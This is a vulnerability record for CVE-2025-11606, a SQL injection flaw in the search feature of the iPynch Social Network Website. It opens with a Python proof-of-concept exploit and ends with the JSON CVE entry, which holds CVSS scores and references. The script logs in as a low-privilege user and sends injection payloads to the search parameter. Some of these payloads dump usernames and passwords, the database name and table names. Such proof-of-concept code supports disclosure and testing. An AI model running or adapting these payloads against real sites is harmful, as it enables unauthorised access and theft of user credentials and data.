CVE-2025-11606

# CVE-2025-11606 - iPynch Social Network Website SQL Injection PoC # Affected Component: Search # Vulnerability Type: SQL Injection import requests TARGET_URL = "http://target-ipynch-site.com" SEARCH_ENDPOINT = "/search" # Adjust based on actual endpoint USERNAME = "low_priv_user" PASSWORD = "password123" def exploit_sql_injection(): """ Exploit SQL injection in Search component of iPynch Social Network Website. The vulnerability exists due to insufficient input sanitization in the search functionality, allowing attackers to inject arbitrary SQL queries. """ session = requests.Session() # Step 1: Authenticate with low-privilege credentials login_data = { "username": USERNAME, "password": PASSWORD } session.post(f"{TARGET_URL}/login", data=login_data) # Step 2: Inject malicious SQL payload via search parameter # Example payloads for SQL injection payloads = [ # Boolean-based blind SQL injection "' OR '1'='1' -- ", # Union-based SQL injection to extract data "' UNION SELECT username,password FROM users-- ", # Time-based blind SQL injection "'; WAITFOR DELAY '0:0:5'-- ", # Error-based SQL injection "' AND 1=CONVERT(int, (SELECT @@version))-- ", # Extract database name "' UNION SELECT NULL,database()-- ", # Extract table names "' UNION SELECT NULL,group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()-- " ] for payload in payloads: params = {"q": payload} # 'q' is the search query parameter response = session.get(f"{TARGET_URL}{SEARCH_ENDPOINT}", params=params) print(f"[*] Payload: {payload}") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response Length: {len(response.text)}") print(f"[*] Response Snippet: {response.text[:500]}") print("-" * 80) if __name__ == "__main__": exploit_sql_injection()

{"cve": {"id": "CVE-2025-11606", "sourceIdentifier": "[email protected]", "published": "2025-10-11T15:16:01.190", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in iPynch Social Network Website up to b6933b6d7f82c84819abe458ccf0e59d61119541. The affected element is an unknown function of the component Search. Performing manipulation results in sql injection. The attack is possible to be carried out remotely. The exploit has been released to the public and may be exploited. This product adopts a rolling release strategy to maintain continuous delivery"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/Lianhaorui/Report/blob/main/sql.docx", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.327928", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.327928", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.672465", "source": "[email protected]"}, {"url": "https://github.com/Lianhaorui/Report/blob/main/sql.docx", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}